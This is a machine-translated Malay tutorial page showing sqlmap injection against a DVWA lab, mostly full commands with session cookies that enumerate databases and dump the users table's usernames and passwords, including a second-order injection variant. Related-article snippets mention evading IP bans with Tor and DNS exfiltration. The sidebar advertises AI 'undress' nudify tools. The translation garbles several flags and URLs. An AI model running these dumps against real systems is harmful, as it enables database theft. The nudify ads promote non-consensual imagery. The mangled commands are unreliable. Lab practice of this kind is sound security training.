Analisis sampel suntikan automatik Sqlmap
Gunakan sqlmap untuk mengautomasikan suntikan ke dalam dvwa
Tetapkan aras dvwa kepada rendah
Buka dvwa’s SQL Injection (SQL Injection (Blind) ), buka penyahpepijatan pelayar, masukkan id pengguna dan serahkan untuk melihat permintaan yang dipintas.
Anda boleh melihat bahawa ia adalah permintaan GET, url "http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit #"
Mari letakkan terus ke dalam salmap untuk menguji, gunakan perintah -u -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id =1&Submit=Submit# "
Anda dapat melihat bahawa anda perlu log masuk di sini, jika tidak, anda tidak boleh kehabisan. Jadi kita perlu menambah kuki untuk mengekalkan log masuk
6. Gunakan proksi burp suite untuk menangkap paket, dapatkan kuki log masuk, tambah --dbs burst data -u "http :// 192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" -- cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" --dbs
Anda boleh melihat pangkalan data itu.> 7. Kami menggunakan -D xxx untuk menentukan pangkalan data untuk dilihat, dan menggunakan --tables untuk melihat semua jadual dalam pangkalan data: -u "http://192.168.1.222:8089/ vulnerabilities/sqli/?id=1&Submit= Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa --tablesLihat hasil yang sedang dijalankan:8>
-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id =1&Submit=Submit#" --cookie="PHPSESSID =0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users --columns
9. Kami menggunakan -D xxx untuk melihat pangkalan data, -T xxx menentukan jadual untuk dilihat dan -C xxx untuk melihat lajur jadual -dump Lihat data lajur
-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=. Hantar#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T pengguna -C kata laluan,pengguna --dump
- Laraskan tahap keselamatan dvwa kepada sederhana, simpan paket data yang ditangkap sebagai fail .txt dan letakkan Dalam direktori sqlmap, terus -r nama fail --dbs (anda boleh menambah sendiri parameter berikutnya)
- Laraskan tahap keselamatan dvwa kepada tinggi. Memandangkan halaman penyerahan kali ini bukan halaman yang sama dengan halaman yang mengembalikan hasil, kaedah sebelumnya tidak boleh digunakan di sini. Untuk menggunakan kaedah suntikan tahap kedua
- URL untuk menyerahkan data
>
- Simpan paket data yang ditangkap sebagai fail .txt dan letakkan dalam direktori sqlmap Seterusnya, letupkan pangkalan data, arahan:
-r 1.txt --url-second
"http://192.168.1.222:8089/vulnerabilities/sqli/" -- kelompok -- tahap 2 -- dbs
Nama teratas
-r 1.txt --url-second "http://192.168.1.222:8089/vulnerabilities/sqli/" - -batch --level 2 -D dvwa --tables
-r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli /"
-- kelompok --tahap 2 -D dvwa -T pengguna --lajur
" http://192.168.1.222:8089/vulnerabilities/sqli /" -- kelompok --tahap 2 -D dvwa -T pengguna -C pengguna,kata laluan --buang
Beberapa isu konseptual:
Suntikan tertib kedua: Pesanan kedua
suntikan sql--tertib kedua Kadangkala apabila input data pada titik suntikan dikembalikan, hasilnya bukan halaman semasa, tetapi halaman lain Pada masa ini, anda perlu menentukan halaman mana untuk mendapatkan respons untuk menentukan sama ada ia benar atau salah. –url kedua diikuti dengan alamat URL halaman yang dikembalikan
--batch: konfigurasi lalai automatik, tidak perlu menekan ya atau tidak secara manual
tahap:Sqlmap mempunyai sejumlah 5 tahap pengesanan, lalainya ialah 1. Lebih tinggi tahap, lebih banyak muatan digunakan semasa pengesanan. Antaranya, tahap 5 mempunyai muatan paling banyak dan secara automatik akan memecahkan dan menyuntik tajuk seperti kuki dan XFF. Sudah tentu, semakin tinggi tahap, semakin perlahan masa pengesanan. Parameter ini akan mempengaruhi titik suntikan ujian dan data POST akan diuji kuki HTTP akan diuji apabila tahap 2. Pengepala Ejen Pengguna/Perujuk HTTP akan diuji apabila tahap 3. Apabila anda tidak pasti parameter mana yang merupakan titik suntikan, untuk memastikan ketepatan, adalah disyorkan untuk menetapkan tahap kepada 5 (kelajuan juga akan menjadi lebih perlahan)
Atas ialah kandungan terperinci Analisis sampel suntikan automatik Sqlmap. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Alat AI Hot

Undresser.AI Undress
Apl berkuasa AI untuk mencipta foto bogel yang realistik

AI Clothes Remover
Alat AI dalam talian untuk mengeluarkan pakaian daripada foto.

Undress AI Tool
Gambar buka pakaian secara percuma

Clothoff.io
Penyingkiran pakaian AI

AI Hentai Generator
Menjana ai hentai secara percuma.

Artikel Panas

Alat panas

Notepad++7.3.1
Editor kod yang mudah digunakan dan percuma

SublimeText3 versi Cina
Versi Cina, sangat mudah digunakan

Hantar Studio 13.0.1
Persekitaran pembangunan bersepadu PHP yang berkuasa

Dreamweaver CS6
Alat pembangunan web visual

SublimeText3 versi Mac
Perisian penyuntingan kod peringkat Tuhan (SublimeText3)

Topik panas



Gunakan sqlmap untuk mengautomasikan suntikan ke dalam dvwa, tetapkan tahap dvwa kepada rendah, buka SQLInjection (SQLInjection(Blind) dvwa), buka penyahpepijatan pelayar, masukkan id pengguna dan serahkan, dan lihat permintaan yang dipintas. Anda boleh melihat bahawa ia adalah permintaan GET, url "http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" Kami terus memasukkannya ke dalam salmap untuk mengujinya, gunakan - u perintah -u"http ://192.168.1.22

Gambaran Keseluruhan 0x00 Baru-baru ini, saya mengalami fenomena aneh apabila menggunakan ujian suntikan sqlmap Versi sqlmap yang lebih tinggi tidak dapat mengesan suntikan, tetapi versi yang lebih rendah boleh mengesan suntikan, dan data boleh kehabisan, yang bukan penggera palsu ujian perbandingan dan melihat kod sumber sqlmap, Menjumpai dua lubang kecil. Format titik suntikan pembiakan senario 0x01: json..."whereparams":[{"name":"keyWord","value":"test"}]} Parameter boleh suntikan: perintah valuesqlmap: pythonsqlmap.py-rsqlpk.txt– flush -session-vvsqlmapv1.2.11 tidak boleh menyuntik s

Bahagian Pertama: Menggunakan Sqlmap 1.1 Pengenalan kepada sqlmap 1. Saya menyebut beberapa pernyataan asas suntikan sql, tetapi suntikan manual sangat menyusahkan Kita boleh menggunakan sqlmap, alat suntikan sql yang berkuasa, untuk mendapatkan data. # sqlmap ialah alat ujian penembusan sumber terbuka yang secara automatik boleh mengesan dan mengeksploitasi kelemahan suntikan SQL dan pelayan yang disambungkan ke pangkalan data. Ia mempunyai enjin pengesanan yang sangat berkuasa, penguji penembusan dengan pelbagai ciri, akses kepada sistem fail asas melalui cap jari pangkalan data dan pelaksanaan perintah melalui sambungan luar jalur. Tapak web rasmi: sqlmap.org(2)#Pangkalan data yang disokong: MySQL, Oracle, PostgreS

Kerana perlu untuk menjalankan ujian penembusan pada tapak web luaran, kebanyakan tapak web mempunyai kawalan kekerapan capaian Setelah kekerapan ini melebihi, IP akan diharamkan secara langsung. Terutama apabila SQLMAP sedang berjalan, ia lebih "merah makcik", dan ralat dilaporkan dan keluar sebelum SQLMAP selesai dijalankan. Jadi saya mula mengkaji mod proksi SQLMAP mempunyai dua mod proksi, satu proksi biasa (proksi HTTP) dan satu lagi proksi bawang. Saya pada asalnya ingin menulis tentang permohonan ejen biasa, tetapi Baidu melihat bahawa artikel ini cukup terperinci dan berhenti bercakap kosong. Sambungan Sqlmap - Pelaksanaan kumpulan proksi IP luaran Mari fokus pada proksi bawang Pada mulanya, apabila bawang digunakan secara langsung untuk suntikan, tiada laporan "makcik merah" Kemudian, apabila bilangan tapak web yang ditembusi meningkat.

1. Prakata Bagaimana untuk mengesan suntikan SQL? Jawapan saya ialah: Apabila Pihak A melakukan keselamatan, pengesanan suntikan SQL agak mudah dilakukan. 1) Ralat pengesanan suntikan. 2) Jangan menyuntik laporan ralat bool kerana positif palsu agak tinggi. 3) Lakukan suntikan masa berdasarkan masa, operasi hubungan dan penyelenggaraan untuk melakukan rakaman db log perlahan, memantau tidur dan pemantauan kata kunci penanda aras Anda boleh menambah nombor ID tugas pengimbasan pada titik perpuluhan masa tidur untuk memudahkan kedudukan. (p.s. Kaedah ini boleh menemui 99% suntikan SQL) Oleh itu, apabila melakukan suntikan masa berasaskan masa, saya mengehadkan ralat masa dengan sangat keras. Walau bagaimanapun, @chengable sedang melakukan kerja berkaitan keselamatan dalam Parti B, berdasarkan t

Terdapat terlalu sedikit artikel yang berkaitan tentang suntikan dns untuk sqlmap di Internet. Mereka hanya memperkenalkan secara ringkas parameter --dns-domain Artikel praktikal yang berkaitan sama ada kabur atau disebut dalam satu pukulan, yang mengelirukan (terutamanya tidak jujur. belum lagi Big boss). Kemudian saya melakukannya sekali lagi dengan merujuk kepada kaedah di Internet. Perkara yang perlu disediakan termasuk satu sqlmap, windows blind injection, dua nama domain dan pelayan rangkaian luaran. Suatu ketika saya sedang melakukan sesuatu, saya terjumpa suntikan buta masa Ia adalah mesin Windows, dan saya teringat kaedah suntikan dns. Sebelum memulakan, saya merancang untuk menggunakan perintah --sql-shell sqlmap untuk menguji muatan suntikan dns Pertama, pergi ke burpsuite.

Apabila saya menguji APP syarikat, saya mendapati bahawa kami menambahkan aksara 32-bit pada semua kandungan parameter dan akhirnya melakukan penyulitan MD5. Memandangkan proses pemprosesan APP terlebih dahulu mengesahkan sama ada tanda itu betul, jika pengesahan tandatangan gagal, ia tidak akan dapat memasuki pangkalan data sama sekali Untuk menggunakan SQLMAP untuk mengujinya, saya menulis skrip untuk data proksi paket data, lakukan penggantian yang disulitkan bagi kandungan parameternya dan 32 aksara. Nota: Skrip ini sesuai untuk sistem dalaman syarikat, kerana anda boleh mengetahui proses penyulitan atau anda boleh mendapatkan kaedah penyulitan JS bahagian hadapan. Pertama, saya menulis program menggunakan Django untuk mensimulasikan sistem syarikat Prosesnya adalah untuk mendapatkan ID POST dan token, dan menambah perkataan yang disulitkan tersuai.

sqlmap membaca dan menulis fail –fail-baca: membaca fail daripada sistem fail sistem pengurusan pangkalan data belakang –fail-tulis: mengedit fail tempatan pada sistem fail sistem pengurusan pangkalan data belakang (menulis dari tempatan) –file-dest : Laluan mutlak ke fail yang ditulis oleh sistem pengurusan pangkalan data bahagian belakang (tulis laluan sasaran Anda boleh menggunakan arahan di atas untuk membaca dan menulis fail sistem selepas suntikan SQL, tetapi prasyaratnya ialah anda perlu membaca dan menulis). kebenaran dan menjadi kebenaran dba, jika tidak, operasi baca dan tulis tidak boleh dilakukan dengan jayanya. Mengambil DVWA sebagai contoh, bina DVWA di bawah kali untuk membaca dan menulis fail. Baca fail: Semak maklumat yang berkaitan dalam PHPinfo, gunakan -file-r
